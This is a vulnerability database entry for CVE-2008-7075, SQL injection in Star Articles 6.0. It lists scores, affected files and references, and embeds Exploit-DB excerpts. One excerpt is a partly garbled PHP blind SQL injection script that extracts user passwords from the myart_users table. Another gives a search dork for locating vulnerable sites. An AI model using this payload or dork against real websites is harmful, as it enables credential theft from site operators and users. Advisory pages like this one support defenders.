CVE-2008-7075
Published 2009-08-25
Priority: P3 · 41 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 2.03% (78.6th percentile)
Multiple SQL injection vulnerabilities in Kalptaru Infotech Ltd. Star Articles 6.0 allow remote attackers to inject arbitrary SQL commands via (1) the subcatid parameter to article.list.php; or the artid parameter to (2) article.print.php, (3) article.comments.php, (4) article.publisher.php, or (5) article.download.php; and (6) the PATH_INFO to article.download.php. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kalptaru_infotech | stararticles | — | — |
No detection rules found.
Exploit-DB
Star Articles 6.0 - Blind SQL Injection (2)
exploitdb·2008-11-27
---
1) {
$url = $argv[1];
if ($argc $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
} else {
echo "\nExploiting failed: By Stack\n";
}
?>
# milw0rm.com [2008-11-27]
Exploit-DB
Star Articles 6.0 - Blind SQL Injection (1)
exploitdb·2008-11-26
---
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ stararticles blind sql injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
APA Center of Yazd University
(https://www.ircert.cc)
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 26 nov 2008
SITE : WwW.DeltaHacking.Net
CONTACT: [email protected]
#####################################################
APPLICATION : stararticles
DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5
VENDOR : http://www.stararticles.com/
DEMO : http://www.kalptarudemos.com/demo/stararticle/
DORK : inurl:"article.download.php"
########################################
No writeups or analysis indexed.
http://osvdb.org/50452
http://osvdb.org/50453
http://osvdb.org/50454
http://osvdb.org/50455
http://osvdb.org/50456
http://secunia.com/advisories/32887
http://www.securityfocus.com/bid/32489
http://www.vupen.com/english/advisories/2008/3269
https://exchange.xforce.ibmcloud.com/vulnerabilities/46981
https://www.exploit-db.com/exploits/7240
https://www.exploit-db.com/exploits/7243